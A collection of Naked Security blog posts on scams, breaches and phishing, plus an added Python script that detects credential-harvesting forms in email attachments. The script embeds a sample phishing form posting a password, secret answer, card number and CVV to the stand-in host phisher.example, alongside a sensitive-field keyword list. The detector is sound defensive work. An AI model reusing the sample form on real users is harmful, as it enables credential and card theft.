According to the Daily Mail an undercover investigation in India has uncovered that some call center workers have been selling confidential information on nearly 500,000 Britons.
Undercover reporters from The Sunday Times met with two individuals who claimed to be IT workers who offered to provide them with 45 different types of data gathered from the victims.
Information offered up included names, addresses, phone numbers and credit card details (including CCV/CVV codes and expiration dates).
The reporters allege they could purchase the records for as little as 2 pence apiece ($0.03 USD). One of the so-called IT workers bragged:
"These [pieces of data] are ones that have been sold to somebody already. This is Barclays, this is Halifax, this is Lloyds TSB. We’ve been dealing so long we can tell the bank by just the card number."
If an unauthorised party has logged into your Facebook account, then you’re far from alone.
New official statistics revealed by the social networking giant show that 0.06% of the more than a billion logins that they handle each day are compromised.
Put another way, that’s more than 600,000 per day – or, if you really like to make your mind melt, one every 14 milliseconds.
The statistic was revealed in an infographic published alongside an official Facebook blog post trumpeting new security features introduced by the firm.
The new security features include Trusted friends (called “Guardian angels” in the infographic).
Google has launched a campaign promoting online safety, in association with the UK’s Citizen’s Advice Bureau.
The campaign, which will include adverts in newspapers, on public transport and online, is being run with the hope of encouraging internet users to take more care over their online activities – including using more secure passwords, and remembering to log out of websites when they have finished using them.
Awareness campaigns about online safety like this are important, as it’s clear that most internet users are pretty clueless about how to best secure their computers and surf safely online.
This isn’t because the public is disinterested in protecting themselves, but due to the fact that many people simply don’t know where to turn, or how to translate complicated buzzwords, geek talk and terminology into simple easy-to-understand English.
So, campaigns like Google’s “Good to Know” one are a *good* thing, as they translate sometimes complicated safety advice into simple terms.
Google, of course, has an interest in people not turning their backs on the internet – it wants users to feel safer online, as that will ultimately increase the popularity of the internet and help Google grow.
To their credit, Google provides a number of technologies to help users defend their accounts from being hacked – but only a minority of users seem to know about them. If you haven’t already done so, check out my advice on how to stop your Gmail account being hacked, for instance.
It’s notable that part of the “Good to Know” campaign appears designed to reassure internet users about the data that Google collects about them to provide its services.
The critical thing, however, will be what I call my “Aunty Hilda test”. If the only people who hear about this advertising campaign are people who are already techie geeks or people who work in information security then it will have failed.
If, however, my Aunty Hilda hears about the campaign – and genuinely learns something about how to protect herself online – then it truly will have succeeded.
With cybercrime and internet fraud on the increase – it’s never been more important to raise awareness and give people simple instructions on how to be safer on the net.
You can find out more about the “Good to Know” campaign at www.google.co.uk/goodtoknow.
With British students about to start another year at university, the last thing they probably want to hear is that there is a problem with a student loan.
But that’s precisely the camouflage that online scammers are using to steal personal information today.
An email, claiming to come from Directgov UK, tells students that there is a problem with the online account for their student loan, and they need to update their account urgently.
Here’s a typical spammed-out message we’ve seen in our traps:
Student Loan Update.
Dear Student Finance Customer.
We at HM Government noticed your Student loan online log in details is incorrect and need to be updated.
DOWNLOAD THE ATTACHMENT TO UPDATE YOUR ACCOUNT NOW
Inline Verification. Directgov UK.
Student Loan Update.html
Clicking on the HTML attachment is not a good idea, however, as it will urge you to enter your details which are then sent via a website to the phishers.
Sophos products block the message as spam, and block the webpage to which the HTML form attempts to post the personal information.
Remember to always be suspicious of unsolicited attachments. Also, I would hope that a good student would have noticed the grammatical mistake in the phisher’s email.
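The HTML attachment described above is a self-contained form that posts whatever is typed into it to the phishers' web server. As an added example (not Sophos code), the following Python script shows how a mail gateway or an analyst might triage such an attachment: it parses the HTML with the standard library and reports any form that submits sensitive-looking fields to a remote host. The sample attachment and the phisher.example domain are constructed for this example.

```python
"""Triage an HTML e-mail attachment for credential-harvesting forms.

Added example, not Sophos code. Reports every <form> whose action posts
to a remote host together with the sensitive-looking fields it collects.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings that mark a field as collecting credentials or payment data.
SENSITIVE = ("pass", "pin", "secret", "card", "cvv", "ccv",
             "account", "sort_code", "login", "user")


class FormAuditor(HTMLParser):
    """Collects action, method and visible field names for each form."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = a.get("name") or a.get("id") or ""
            # Hidden fields carry no typed data, so they are not of interest here.
            if (a.get("type") or "").lower() != "hidden" and name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_attachment(html_text):
    """Return findings for forms that post sensitive fields to a remote host."""
    parser = FormAuditor()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).netloc
        if not host:  # relative action: nothing leaves the current origin by itself
            continue
        hits = [f for f in form["fields"] if any(k in f.lower() for k in SENSITIVE)]
        if hits:
            findings.append({"host": host, "method": form["method"], "fields": hits})
    return findings


# Constructed sample modelled on the described attachment (placeholder domain).
SAMPLE = """<html><body><h2>Student Loan Update</h2>
<form method="post" action="http://phisher.example/collect.php">
Customer Reference: <input name="customer_ref">
Password: <input type="password" name="password">
Secret answer: <input name="secret_answer">
Card number: <input name="card_number"> CVV: <input name="cvv">
<input type="hidden" name="campaign" value="sfe1">
<input type="submit" value="Update Account">
</form></body></html>"""

if __name__ == "__main__":
    for f in audit_attachment(SAMPLE):
        print(f"form posts to {f['host']} via {f['method'].upper()}: {', '.join(f['fields'])}")
```

Run against the sample it reports one form posting a password, a secret answer and card details to phisher.example; a form with a relative action produces no finding.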
The Anonymous hacktivist group has announced that it will launch its very own social network, to be called AnonPlus, after accounts it held with Google+ were suspended for violating terms and conditions.
Google+ has recently been enforcing a policy of shutting down profiles which contain fake names or those that represent organisations rather than individuals, so it’s not exactly surprising to see Anonymous-related profiles being zapped.
AnonPlus, Anonymous’s answer to the likes of Google+, is far from ready, however.
A team of 17 Java developers has been announced on the site’s holding page, alongside a manifesto announcing the “new social network where there is no fear of censorship” and “no more oppression”, but it seems that any working infrastructure for AnonPlus is some considerable way off still.
It’s hard not to be cynical about the prospects of a new social network being built from scratch.
Yes, Google – with all the resources it has available – appears to have done a good job with Google+, but a loosely-knit amateur collective like Anonymous, which rejects organisational constructs, will surely face a much steeper challenge.
Anyone remember Diaspora? They had the advantages of support from many and even some funding, but they seem to have gone awfully quiet lately, don’t they?
It will be interesting to see if AnonPlus becomes popular if/when it launches with the very people it is intended to help – those who are being prevented by oppressive regimes from sharing information freely and safely with the rest of the world.
A gang of hackers known as SwagSec announced at the tail end of last week that they had hacked into Lady Gaga’s UK website and made off with a database of names and email addresses of fans. To prove their point, they published the stolen data online.
The press reported that a source close to Lady Gaga said that she was:
"upset and hopes police get to the bottom of how this was allowed to happen"
If she was upset, she made no mention of the hack on her Twitter page, and posted no apology to her UK fans for the poor website security. She wasn’t, however, too upset to tweet about Emmy award nominations or to drop a line to Cher about doing a duet remix.
Although it’s right that the authorities should be informed regarding SwagSec’s illegal activities, there should surely be some recognition at Gaga HQ that perhaps the website was doing a lousy job at securing its fans’ information?
Lady Gaga’s record label, Universal, said it had confirmed that the hack had occurred and said that police had been informed:
"The hackers took a content database dump from http://www.ladygaga.co.uk and a section of email, first name and last name records were accessed. There were no passwords or financial information taken. We take this very seriously and have put in place additional measures to protect personally identifiable information. All those affected have been advised."
The risk to users who had their details compromised, of course, is that they could have been the subject of targeted attacks. Imagine how many of them might have opened an attachment or clicked on a link if they received an email claiming to be about free tickets for a Lady Gaga concert, or a sneak preview of her new video.
But although Universal says that it has contacted everyone who was affected – can they be confident that they know the extent of SwagSec’s hack? After all, the hack is claimed to have occurred weeks ago, but was only made public by SwagSec at the end of last week.
Wouldn’t it be more open and transparent to post a message to fans on the Lady Gaga UK website, telling them all what occurred? I went looking and couldn’t find anything to warn the wider array of Lady Gaga fans.
You may remember that the SwagSec hacking group defaced Amy Winehouse’s website earlier this month as well.
One wonders what eccentric female troubadour they will target next.
Naked Security has been hearing from our Canadian readers about more fake technical support calls trying to get people to infect themselves with fake anti-virus software, keyloggers and remote control software. That’s right, they are calling people on the telephone and trying to defraud them in numerous ways.
The fraudulent callers represent themselves as being from Microsoft, Telus (one of the traditional Canadian phone companies) and other brands believed to be trusted by the intended victims.
As we have reported previously the calls seem to originate from overseas call centres, but often use caller ID numbers that appear to be local. They likely are taking advantage of extremely cheap Voice Over IP technologies that allow them to purchase local phone numbers.
They falsely claim the user’s computer has been sending error messages to them and that they are calling to help fix their PCs. Their modus operandi varies, although the outcome is always the same: them stealing your money.
They usually offer to assist you through remote control software, often from legitimate vendors like LogMeIn. Once they are able to access your PC they will install fake anti-virus software or other malware and charge you for the privilege. This way they get two bites at the apple… Once for the technical support incident and another when you pay for the rogue security suite.
This has been common enough recently that Telus has posted an advisory on their website. Telus states that they are working with the Royal Canadian Mounted Police to trace the origin of the calls and recommend Telus customers who believe they have been defrauded call 310-2255.
A recent study by Microsoft showed that the average Canadian victim had $1560 USD stolen from their accounts. It is important to apply the same skepticism to incoming phone calls as you would apply to unsolicited emails or strangers ringing your doorbell.
Paul Ducklin and Sean Richmond of Sophos Australia recorded a podcast explaining these scams and providing advice on how to avoid becoming a victim; I recommend listening to it and sharing it with your friends and family.
These attacks aren’t just affecting Canadians, we have had reports from Australia, the United Kingdom and the United States as well. Stay vigilant and remember, hanging up isn’t rude when someone is calling to scam you.
Thanks to Savio in SophosLabs Canada and Naked Security reader Lystra for contributing information to this story.